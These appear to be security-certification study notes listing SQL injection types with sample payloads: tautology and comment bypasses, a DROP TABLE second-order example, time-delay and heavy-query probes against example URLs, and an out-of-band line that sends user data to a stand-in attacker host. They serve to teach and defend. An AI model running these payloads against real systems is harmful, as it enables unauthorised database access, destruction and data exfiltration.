SQL injection types
- Types include
- Other classifications sometimes include
- Database management system-specific SQL injection
- Using specific SQL statements to certain database engine.
- Compounded SQL injection
- Combining SQL injection with other web application attacks such as • insufficient authentication • DDoS attacks • DNS hijacking • XSS.
- E.g. DDoSing through
http://cloudarchitecture.io/azure?id=2 and WAITFOR DELAY '0:0:50'
- Second-order SQL injection
- When user-supplied data is stored by the application and later incorporated into SQL queries in an unsafe way.
- E.g. during login user name and password is retrieved as
WHERE username="$username" and password="$password"
, one could then set a password as"); drop table users;
to delete the table and it will only executed during user login.
- Database management system-specific SQL injection
In-band SQL injection
- Also known as • classic SQL injection • in-band SQLi • classic SQLi.
- Attacker uses one channel to inject malicious queries and retrieve results.
Error-based SQL injection
- Causing database to throw errors and in such a way to identify the vulnerabilities
- One of the most common injections
- Examples
- Through parameter tampering in GET/POST requests
- E.g. adding
′
in the end:http://testphp.vulnweb.com/listproducts.php?cat=1′
- Shows error:
Error: Check the manual that corresponds to your MySQL server version. Invalid syntax "' at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
- Reveals file names, database type etc.
- Shows error:
- Can use e.g. Burp Suite
- E.g. adding
- Converting anything to integer:
or 1=convert(int, (select * from tablename))
Syntax error converting the nvarchar value '<sql execution result>'
- Through parameter tampering in GET/POST requests
System stored procedure
Stored procedure: Precompiled function-like SQL statements supported by many DBMS.
Injecting malicious queries into stored procedures
E.g.
@vname
is vulnerable to injection in following procedure:CREATE PROCEDURE getDescription
@vname VARCHAR(50)
AS
EXEC('SELECT description FROM products WHERE name = '''+@vname+ '''')
RETURN
Illegal/Logically incorrect query
- Goal is to gather information about the type and structure of the back-end database.
- Considered as a preliminary step for further attacks.
- Attacker takes advantage of error messages sent by the database on incorrect queries.
- Often exposes the names of tables and columns.
- E.g.
SELECT*FROM table_nameWHERE id=@id"
(missing whitespaces) would cause incorrect syntax error.
UNION SQL injection
- 📝 Using the
UNION
operator to inject a malicious query. - Allows appending results to the original query.
- E.g.
SELECT a, b FROM table1 UNION SELECT c, d FROM table2
Tautology
- Manipulating the
WHERE
operator in the query to always have atrue
value - 📝 Utilizes
OR
operator e.g. by appendingOR 1 = 1
- E.g.
select * from user_details where userid = 'abcd' and password = 'anything' or 'x'='x'
- 🤗 In logic, a tautology is a formula which is true in every possible interpretation
- E.g. either it will rain tomorrow, or it won't rain
Comment SQL injection
End-of line comment
- Also known as • terminating query • single-line comment • *end-of-line comment • end of line comment.
- 📝 Usually done by adding
--
at the end of the injected query--
(two dashes): comment out the rest so SQL engine ignores the rest of the query
- E.g. by appending
' or 1 = 1 --
in the end of the query would ignore the password checkselect * from users where name='injection starts here' or 1=1 --' AND password='pwd'
- Basically tells the server if 1 = 1 (always true) to allow the login.
- Double dash (--) tells the server to ignore the rest of the query
Inline comments
Using C-style comments to eliminate a part of the query.
Requires attacker having a good idea of how the input is integrated.
E.g.
Query is
$sql = "INSERT INTO members (username, isadmin, password) VALUES ('".$username."', 0, '".$password."')"
Attackers input include
username
andpassword
Attacker enters following values to avoid password check:
attacker', 1, /*
*/'pwd
It then generate:
INSERT INTO members (username, isadmin, password) VALUES ('attacker', 1, /*', 0, '*/'pwd')
Piggyback query
- Also known as • piggybacked query • piggy-backed query • statement injection
- Appending malicious query to the end of the original one.
- Common way is to append the query delimiter (
;
)- E.g.
normal SQL statement + ";" + INSERT (or UPDATE, DELETE, DROP) <rest of injected query>
- E.g.
Blind SQL injection
- Also known as • blind SQLi • inferential SQL injection • inferential SQLi • inference SQL injection • inference SQLi
- Attacker is unable to see the direct results of the injected queries
- instead attacker observes web applications response and behavior.
- As database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions.
- Allows remote database fingerprinting to e.g. know which type of database is in use
- Can be automated using e.g.
- Absinthe :: Automated Blind SQL Injection
- SQLBrute, multi threaded blind SQL injection bruteforcer in Python
- bsqlbf, a blind SQL injection tool in Perl
Boolean-based blind SQL
- Also called content-based blind SQL
- Attacker forms queries to return
true
orfalse
- Depends on changing HTTP results depending on SQL results for each condition.
- Allows enumerating the database character by character (slow)
- E.g.
- URL:
http://newspaper.com/items.php?id=2
- Query in back-end:
SELECT title, description, body FROM items WHERE ID = 2
- Attacker sends
http://newspaper.com/items.php?id=2 and 1=2
to make it returnfalse
- Attacker inspects if application shows a page or with which status code
- URL:
Time-based SQL injection
- Also called • time delay SQL injection • double blind SQL injection • 2blind SQL injection
- 📝 Using time delay to evaluate the result (true or false) of the malicious query
- Allows for testing of existing vulnerabilities.
- Uses commands like
waitfor
,sleep
,benchmark
- Helps with database fingerprinting as MySQL, MSSQL, and Oracle have different functions to get current time.
- E.g.
http://www.site.com/vulnerable.php?id=1' waitfor delay '00:00:10'--
- Allows enumerating each character (very slow)
- E.g. if database name starts with A, wait 10 seconds
- Can use character comparison, regex or
LIKE
in Microsoft SQL.
- Time consuming, but there are automated tools such as
sqlmap
Heavy query
- Injecting queries that takes time to test
- Useful when time functions such as
waitfor
are disabled by administrator - E.g.
SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C
- Can inject something like:
1 AND 1>(SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)
- Can inject something like:
Out-of-band SQL injection
- Also known as • OOB injection • OOB SQLi
- Exhilarate data through outbound channel
- E.g. e-mail sending or file writing/reading functionalities
- Difficult as it depends on target having
- Supported databases that can initiate outbound DNS or HTTP requests
- Lack of input validation
- Network access to the database server
- Privileges execute the necessary function
- E.g.
||UTL_HTTP.request('http://test.attacker.com/'||(SELECT user FROM users))